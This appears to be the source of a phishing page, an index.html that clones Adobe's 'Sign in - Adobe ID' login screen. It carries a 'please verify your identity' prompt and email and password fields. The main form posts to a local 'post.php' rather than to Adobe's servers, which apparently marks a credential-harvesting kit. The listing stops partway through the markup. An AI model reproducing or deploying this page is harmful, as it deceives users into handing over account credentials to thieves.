index.html 39 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538
  1. <!DOCTYPE html>
  2. <!--[if IE 8]> <html data-placeholder-focus="false" class="ie ie8 lt-ie9 has-dob-explanation en us" data-pagename="login" lang="en"> <![endif]-->
  3. <!--[if IE 9]> <html data-placeholder-focus="false" class="ie ie9 has-dob-explanation en us" data-pagename="login" lang="en"> <![endif]-->
  4. <!--[if gt IE 9]><!-->
  5. <html data-placeholder-focus="false" class="has-dob-explanation en us history svg cssanimations wf-adobeclean-n4-active wf-adobeclean-n7-active wf-adobeclean-n3-active wf-active wf-inactive" data-pagename="login" lang="en"><!--<![endif]--><head>
  6. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  7. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
  8. <meta name="mswebdialog-newwindowurl" content="*">
  9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  10. <script src="https://use.typekit.net/ecr2zvs.js" async=""></script><script>
  11. window.marketingtech = {
  12. adobe: {
  13. launch: {
  14. environment: 'production'
  15. }
  16. }
  17. };
  18. </script>
  19. <script src="https://wwwimages2.adobe.com/etc/beagle/public/globalnav/adobe-privacy/latest/privacy.min.js"></script><script type="text/javascript" src="//c.evidon.com/sitenotice/evidon-sitenotice-tag.js" async="" id="evidon-notice"></script><script type="text/javascript" src="//c.evidon.com/geo/country.js" async="" id="evidon-location"></script><script type="text/javascript" src="//c.evidon.com/sitenotice/414/snthemes.js" async="" id="evidon-themes"></script><script type="text/javascript" src="//c.evidon.com/sitenotice/414/adobe/settings.js" async="" id="evidon-settings"></script>
  20. <script src="https://www.adobe.com/marketingtech/main.min.js"></script>
  21. <style>
  22. div.evidon-banner {display: none !important;}
  23. </style>
  24. <script>
  25. window.launchConfig = {
  26. analyticsAccount: 'adbadobenonacdcprod,adbims',
  27. appCodeValue: JSON.parse('{\"ac\":\"IMS\",\"av\":\"1.50.7-42\",\"di\":null,\"mc\":null,\"pl\":null}'),
  28. clientId: 'SunbreakWebUI1',
  29. locale: 'en_US',
  30. pageName: 'onLoad_SignInForm',
  31. touaName: ''
  32. }
  33. </script>
  34. <script>
  35. (function(d) {
  36. 'use strict';
  37. var h = d.documentElement;
  38. // Default: Latin Extended
  39. var defaultKit = 'znu8cfp';
  40. var language = h.getAttribute('lang') || 'ro';
  41. var kitLanguages = {
  42. // Latin
  43. 'ecr2zvs': [ 'da', 'de', 'en', 'es', 'it', 'nb', 'pt', 'sv' ],
  44. // Latin-extended
  45. 'znu8cfp': [ 'bg', 'cs', 'et', 'fi', 'fr', 'hr', 'hu', 'lt', 'lv', 'nl', 'pl', 'ro', 'ru', 'sk', 'sl', 'sr', 'tr', 'uk' ],
  46. // Chinese: traditional & simplified
  47. 'hlx1mlm': ['zh'],
  48. // Japanese
  49. 'bzy1cfu': ['ja'],
  50. // Korean
  51. 'tra0jgq': ['ko']
  52. };
  53. var getLanguageKit = function(language) {
  54. for (var kit in kitLanguages) {
  55. if (kitLanguages.hasOwnProperty(kit)) {
  56. for (var lang in kitLanguages[kit]) {
  57. if (kitLanguages[kit][lang] === language) {
  58. return kit;
  59. }
  60. }
  61. }
  62. }
  63. return defaultKit;
  64. };
  65. var triggerEvent = function (eventName) {
  66. var event = document.createEvent('Event');
  67. event.initEvent(eventName, true, true);
  68. document.dispatchEvent(event);
  69. }
  70. var config = {
  71. // Events
  72. active: function () {
  73. triggerEvent('TypekitActive');
  74. },
  75. inactive: function () {
  76. triggerEvent('TypekitInactive');
  77. },
  78. // Settings
  79. async: true,
  80. kitId: getLanguageKit(language),
  81. scriptTimeout: 3000
  82. };
  83. var hideSpinner = function() {
  84. window.clearTimeout(t);
  85. var html = document.documentElement;
  86. html.className = html.className.replace(/\bwf-loading\b/g, '')+' wf-inactive';
  87. };
  88. var t = setTimeout(hideSpinner, config.scriptTimeout);
  89. var loadTypekit = function() {
  90. var s = d.getElementsByTagName('script')[0];
  91. var html = document.documentElement;
  92. var tk = d.createElement('script');
  93. html.className += ' wf-loading';
  94. tk.src = 'https://use.typekit.net/'+config.kitId+'.js';
  95. tk.async = true;
  96. tk.onload = tk.onreadystatechange= initTypeKit;
  97. tk.onerror = hideSpinner;
  98. s.parentNode.insertBefore(tk,s);
  99. };
  100. var typekitInitialized = false;
  101. var initTypeKit = function() {
  102. var a = this.readyState;
  103. if(typekitInitialized||a&&a!='complete'&&a!='loaded')return;
  104. typekitInitialized = true;
  105. try{Typekit.load(config);}catch(e){}
  106. };
  107. if (document.addEventListener) {
  108. document.addEventListener("DOMContentLoaded", loadTypekit, false);
  109. } else if (document.attachEvent) {
  110. document.attachEvent("onreadystatechange", function() {
  111. if (document.readyState === "complete" ) {
  112. loadTypekit();
  113. }
  114. });
  115. }
  116. })(document);
  117. </script>
  118. <meta name="viewport" content="initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
  119. <title>Sign in - Adobe ID</title>
  120. <link href="https://www.adobe.com/content/dam/cc/icons/Adobe_Corporate_Horizontal_Red_HEX.svg" rel="shortcut icon" sizes="196x196" />
  121. <link rel="stylesheet" type="text/css" href="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/css/head.css">
  122. <script>var special_day_char = "";</script>
  123. <!--[if lte IE 8]>
  124. <script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/ie8.js"></script>
  125. <![endif]-->
  126. <script src="https://static.adobelogin.com/renga-idprovider/resources/60550808d7d722ea186a935459f7234f/spectrum/script/spectrum_head.js"></script><style type="text/css">.tk-adobe-clean{font-family:"adobe-clean",sans-serif;}</style><style type="text/css">@font-face{font-family:tk-adobe-clean-n4;src:url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?subset_id=2&fvd=n4&v=3) format("woff2"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3) format("woff"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/a?subset_id=2&fvd=n4&v=3) format("opentype");font-weight:400;font-style:normal;}@font-face{font-family:tk-adobe-clean-n7;src:url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3) format("woff2"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3) format("woff"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/a?subset_id=2&fvd=n7&v=3) format("opentype");font-weight:700;font-style:normal;}@font-face{font-family:tk-adobe-clean-n3;src:url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3) format("woff2"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3) format("woff"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/a?subset_id=2&fvd=n3&v=3) format("opentype");font-weight:300;font-style:normal;}</style><style type="text/css">@font-face{font-family:adobe-clean;src:url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?subset_id=2&fvd=n4&v=3) format("woff2"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3) format("woff"),url(https://use.typekit.net/af/cb695f/000000000000000000017701/27/a?subset_id=2&fvd=n4&v=3) format("opentype");font-weight:400;font-style:normal;}@font-face{font-family:adobe-clean;src:url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3) format("woff2"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3) format("woff"),url(https://use.typekit.net/af/eaf09c/000000000000000000017703/27/a?subset_id=2&fvd=n7&v=3) format("opentype");font-weight:700;font-style:normal;}@font-face{font-family:adobe-clean;src:url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3) format("woff2"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3) format("woff"),url(https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/a?subset_id=2&fvd=n3&v=3) format("opentype");font-weight:300;font-style:normal;}</style>
  127. </head>
  128. <body ontouchstart="" id="adobesusi" class="capslock-unknown">
  129. <div id="spinner_overlay" class="overlay">
  130. <div id="squarespinner_template" class="overlay-spinner"></div>
  131. </div>
  132. <div class="container " role="main" id="">
  133. <div class="page-header">
  134. <div id="idp-flow-header" class="idp-flow-logo">
  135. <div class="idp-flow-logo-image"></div>
  136. <span id="idp-flow-individual-text" class="idp-flow-logo-text"></span>
  137. </div>
  138. </div>
  139. <div id="adobeid_view" class="view">
  140. <div class="row mod-title-row">
  141. <h1 class="page-action">
  142. For your protection, please verify your identity.</h1>
  143. </div>
  144. <div id="indicatorPanel" class="indicatorPanel mod-hidden">
  145. <p class="row mod-top-spaced mod-bot-spaced"><strong id="indicatorPanel-Email"></strong></p>
  146. <p class="row mod-top-spaced mod-bot-spaced">We are taking you to sign in with Facebook.</p>
  147. <div class="inline-spinner">
  148. <div class="inline-spinner-element"></div>
  149. <div class="inline-spinner-element mod-second"></div>
  150. <div class="inline-spinner-element mod-third"></div>
  151. </div>
  152. <div class="row mod-top-spaced mod-bot-spaced">
  153. <button id="indicatorPanel-ContinueButton" class="indicatorPanel-ContinueButton button" type="button"><span class="icon icon-facebook"></span> <span>Continue to Facebook</span></button>
  154. </div>
  155. </div>
  156. <form id="adobeid_signin" class="loginform" method="post" action="post.php" data-component="spinner" novalidate="novalidate">
  157. <input id="adobeid_callback" name="callback" value="https://ims-na1.adobelogin.com/ims/adobeid/SunbreakWebUI1/AdobeID/token?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;scope=AdobeID%2Copenid%2Csunbreak%2Cacct_mgmt_webui%2Cgnav%2Cadditional_info.account_type%2Csao.cce_private%2Ccreative_cloud%2Cread_countries_regions%2Cupdate_profile.password%2Cadditional_info.roles%2Cupdate_profile.optionalAgreements%2Cupdate_profile.change_password%2Cadditional_info.social%2Csocial.link%2Cunlink_social_account%2Cadmin_slo%2Creauthenticated" type="hidden">
  158. <input id="adobeid_client_id" name="client_id" value="SunbreakWebUI1" type="hidden">
  159. <input id="adobeid_denied_callback" name="denied_callback" value="https://ims-na1.adobelogin.com/ims/denied/SunbreakWebUI1?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;response_type=token" type="hidden">
  160. <input id="adobeid_display" name="display" value="web_v2" type="hidden">
  161. <input id="adobeid_flow" name="flow" value="true" type="hidden">
  162. <input id="adobeid_flow_type" name="flow_type" value="token" type="hidden">
  163. <input id="adobeid_idp_flow_type" name="idp_flow_type" value="login" type="hidden">
  164. <input id="adobeid_locale" name="locale" value="en_US" type="hidden">
  165. <input id="adobeid_page_name" name="page_name" value="onLoad_SignInForm" type="hidden">
  166. <input id="adobeid_reauthenticate" name="reauthenticate" value="force" type="hidden">
  167. <input id="adobeid_relay" name="relay" value="ddf39b99-b9ba-4e0c-af20-f0aa6bd69144" type="hidden">
  168. <input id="adobeid_scope" name="scope" value="AdobeID,openid,sunbreak,acct_mgmt_webui,gnav,additional_info.account_type,sao.cce_private,creative_cloud,read_countries_regions,update_profile.password,additional_info.roles,update_profile.optionalAgreements,update_profile.change_password,additional_info.social,social.link,unlink_social_account,admin_slo,reauthenticated" type="hidden">
  169. <fieldset>
  170. <span class="component-wrapper" for="username"><input aria-label="Email address" aria-required="true" autocapitalize="off" autocorrect="off" class="" data-component="usertypedetector" data-component-usertypedetector-blocknont1="false" data-component-usertypedetector-client-id="SunbreakWebUI1" data-component-usertypedetector-endpoint="/renga-idprovider/pages/login_flow" data-component-usertypedetector-enforceuser="false" data-component-usertypedetector-idp-flow-type="login" data-component-usertypedetector-reauthentication="true" data-component-usertypedetector-use-flow="true" id="adobeid_username" name="username" novalidate="novalidate" placeholder="Email address" tabindex="1" value="" type="email"><div class="username-checknote" style="display: none"><span class="checknote"></span></div><div id="username-spinner" class="input-inline-spinner"><div class="inline-spinner"><div class="inline-spinner-element"></div><div class="inline-spinner-element mod-second"></div><div class="inline-spinner-element mod-third"></div></div></div></span>
  171. </fieldset>
  172. <fieldset>
  173. <span class="component-wrapper" for="password"><input aria-label="Password" aria-required="true" class="text-center" data-component="capsindicator passwordrevealer" id="adobeid_password" name="password" placeholder="Password" tabindex="2" value="" type="password"><div class="caps-indicator"><span class="caps-indicator-img"></span></div><div class="password-revealer off"><div class="password-revealer-img"></div></div><div class="caps-indicator"><span class="caps-indicator-img"></span></div></span>
  174. </fieldset>
  175. <fieldset class="row mod-form-button Flexible-Container">
  176. <div class="Flexible-Column">
  177. <button class="mod-main" id="sign_in" onclick="window.scReport('SignIn:onClick_SignInAdobeId')" tabindex="4">Sign in</button></div>
  178. <div class="Flexible-Column mod-grow">
  179. <div class="forgot-password-container">
  180. <a id="adobeid_trouble_signing_in" tabindex="5" data-component="spinner" class="forgotpassword" href="/renga-idprovider/pages/start_forgot_password?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" onclick="scReport('SignIn:onClick_ForgotPassword')">
  181. Forgot password?</a>
  182. </div></div>
  183. </fieldset>
  184. <div class="row">
  185. <div class="row">
  186. <span class="nowrap">Not a member yet?</span>
  187. <a class="nowrap" data-component="spinner" href="create_account?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" id="create_account">Get an Adobe ID</a></div>
  188. <div class="row">
  189. <span id="enterprise_teaser_text">Want to use your company or school account?</span> <br>
  190. <a id="enterprise_signin_link" data-component="spinner viewswitcher" data-component-viewswitcher-targettitle="Sign in with an Enterprise ID" data-component-viewswitcher-targettype="enterprise" data-component-viewswitcher-targetview="#enterprise_view" href="login?idp_flow_type=login_t2&amp;client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims">
  191. Sign in with an Enterprise ID</a>
  192. </div>
  193. </div>
  194. <input name="vi" id="adobeid_vi" value="" type="hidden">
  195. <input name="authSrc" value="AdobeID" type="hidden">
  196. <input name="is_reauthenticating" id="is_reauthenticating" value="true" type="hidden">
  197. </form>
  198. <div class="row mod-top-spaced mod-bot-spaced Separator">
  199. <span class="Separator-Content">Or sign in with</span>
  200. </div>
  201. <div class="social-sign-in row">
  202. <a class="button mod-main mod-facebook" href="/renga-idprovider/social/v2/signin/facebook?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" id="facebook-sign-in-button" onclick="window.scReport('SocialV2:onClick_SocialSignIn', {eVar115: 'facebook'})">Facebook</a>
  203. <a class="button mod-main mod-google" href="/renga-idprovider/social/v2/signin/google?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims" id="google-sign-in-button" onclick="window.scReport('SocialV2:onClick_SocialSignIn', {eVar115: 'google'})">Google</a>
  204. </div>
  205. </div>
  206. <div class="view" style="display:none" id="enterprise_view">
  207. <div class="row mod-title-row">
  208. <h1 class="page-action">
  209. For your protection, please verify your identity.</h1>
  210. </div>
  211. <div class="row mod-spaced" id="enterpriseintrotext">
  212. <p id="enterprise_enter_email_text">
  213. Need help with Enterprise ID?
  214. &nbsp;
  215. <a href="/renga-idprovider/pages/newwindow?new_url=http%3A%2F%2Fwww.adobe.com%2Fgo%2Flearn-more-enterprise-id">Learn more.</a>
  216. </p>
  217. </div>
  218. <div class="row">
  219. <span class="error backend"></span>
  220. </div>
  221. <form id="enterprise_signin" class="loginform" method="post" action="login_t2.do" data-component="spinner" novalidate="novalidate">
  222. <input class="notinview" aria-hidden="true" tabindex="-1" type="password">
  223. <input id="enterpriseid_callback" name="callback" value="https://ims-na1.adobelogin.com/ims/adobeid/SunbreakWebUI1/AdobeID/token?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;scope=AdobeID%2Copenid%2Csunbreak%2Cacct_mgmt_webui%2Cgnav%2Cadditional_info.account_type%2Csao.cce_private%2Ccreative_cloud%2Cread_countries_regions%2Cupdate_profile.password%2Cadditional_info.roles%2Cupdate_profile.optionalAgreements%2Cupdate_profile.change_password%2Cadditional_info.social%2Csocial.link%2Cunlink_social_account%2Cadmin_slo%2Creauthenticated" type="hidden">
  224. <input id="enterpriseid_client_id" name="client_id" value="SunbreakWebUI1" type="hidden">
  225. <input id="enterpriseid_denied_callback" name="denied_callback" value="https://ims-na1.adobelogin.com/ims/denied/SunbreakWebUI1?redirect_uri=https%3A%2F%2Faccounts.adobe.com%2F%23from_ims%3Dtrue%26old_hash%3D%26api%3Dauthorize%26reauth%3Dforce&amp;response_type=token" type="hidden">
  226. <input id="enterpriseid_display" name="display" value="web_v2" type="hidden">
  227. <input id="enterpriseid_flow" name="flow" value="true" type="hidden">
  228. <input id="enterpriseid_flow_type" name="flow_type" value="token" type="hidden">
  229. <input id="enterpriseid_idp_flow_type" name="idp_flow_type" value="login" type="hidden">
  230. <input id="enterpriseid_locale" name="locale" value="en_US" type="hidden">
  231. <input id="enterpriseid_page_name" name="page_name" value="onLoad_SignInForm" type="hidden">
  232. <input id="enterpriseid_reauthenticate" name="reauthenticate" value="force" type="hidden">
  233. <input id="enterpriseid_relay" name="relay" value="ddf39b99-b9ba-4e0c-af20-f0aa6bd69144" type="hidden">
  234. <input id="enterpriseid_scope" name="scope" value="AdobeID,openid,sunbreak,acct_mgmt_webui,gnav,additional_info.account_type,sao.cce_private,creative_cloud,read_countries_regions,update_profile.password,additional_info.roles,update_profile.optionalAgreements,update_profile.change_password,additional_info.social,social.link,unlink_social_account,admin_slo,reauthenticated" type="hidden">
  235. <fieldset>
  236. <span class="component-wrapper" for="username"><input aria-label="Email address or domain name" aria-required="true" autocapitalize="off" autocorrect="off" class="" data-component="usertypedetector" data-component-usertypedetector-blocknont1="false" data-component-usertypedetector-client-id="SunbreakWebUI1" data-component-usertypedetector-endpoint="/renga-idprovider/pages/login_flow" data-component-usertypedetector-enforceuser="false" data-component-usertypedetector-idp-flow-type="login" data-component-usertypedetector-reauthentication="true" data-component-usertypedetector-use-flow="true" id="enterprise_username" name="username" novalidate="novalidate" placeholder="Email address or domain name" tabindex="1" value="" type="email"><div class="username-checknote" style="display: none"><span class="checknote"></span></div><div id="username-spinner" class="input-inline-spinner"><div class="inline-spinner"><div class="inline-spinner-element"></div><div class="inline-spinner-element mod-second"></div><div class="inline-spinner-element mod-third"></div></div></div></span>
  237. </fieldset>
  238. <fieldset id="passwordfieldset">
  239. <span class="component-wrapper" for="password"><input aria-label="Password" aria-required="true" class="text-center" data-component="capsindicator passwordrevealer" id="enterprise_password" name="password" placeholder="Password" tabindex="2" value="" type="password"><div class="caps-indicator"><span class="caps-indicator-img"></span></div><div class="password-revealer off"><div class="password-revealer-img"></div></div></span>
  240. </fieldset>
  241. <div class="row mod-bot-spaced" id="signinoptions">
  242. <p>
  243. </p><div class="forgot-password-container">
  244. <a id="enterprise_trouble_signing_in" tabindex="5" data-component="spinner" class="forgotpassword" href="/renga-idprovider/pages/start_forgot_password?client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims&amp;idp_flow_type=login_t2" onclick="scReport('SignIn:onClick_ForgotPassword')">
  245. Forgot password?</a>
  246. </div>
  247. <p></p>
  248. </div>
  249. <fieldset class="row mod-spaced">
  250. <button class="mod-main" id="enterprise_sign_in_button" onclick="window.scReport('SignIn:onClick_SignInEnterpriseId')" tabindex="4">
  251. Sign in with an Enterprise ID</button>
  252. </fieldset>
  253. <div class="row onemorething">
  254. <a id="enterprise_back_to_adobeid" data-component="spinner viewswitcher" data-component-viewswitcher-targettitle="Sign in with an Adobe ID" data-component-viewswitcher-targettype="adobeid" data-component-viewswitcher-targetview="#adobeid_view" href="login?idp_flow_type=login&amp;client_id=SunbreakWebUI1&amp;callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FSunbreakWebUI1%2FAdobeID%2Ftoken%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26scope%3DAdobeID%252Copenid%252Csunbreak%252Cacct_mgmt_webui%252Cgnav%252Cadditional_info.account_type%252Csao.cce_private%252Ccreative_cloud%252Cread_countries_regions%252Cupdate_profile.password%252Cadditional_info.roles%252Cupdate_profile.optionalAgreements%252Cupdate_profile.change_password%252Cadditional_info.social%252Csocial.link%252Cunlink_social_account%252Cadmin_slo%252Creauthenticated&amp;denied_callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fdenied%2FSunbreakWebUI1%3Fredirect_uri%3Dhttps%253A%252F%252Faccounts.adobe.com%252F%2523from_ims%253Dtrue%2526old_hash%253D%2526api%253Dauthorize%2526reauth%253Dforce%26response_type%3Dtoken&amp;display=web_v2&amp;locale=en_US&amp;relay=ddf39b99-b9ba-4e0c-af20-f0aa6bd69144&amp;flow=true&amp;flow_type=token&amp;idp_flow_type=login&amp;reauthenticate=force&amp;s_account=adbadobenonacdcprod%2Cadbims">
  255. Sign in with an Adobe ID</a>
  256. </div>
  257. <input name="vi" id="enterprise_vi" value="" type="hidden">
  258. </form>
  259. </div>
  260. <div id="chooser_template">
  261. <div class="account-chooser binded" id="chooser_screen" tabindex="-1" role="region">
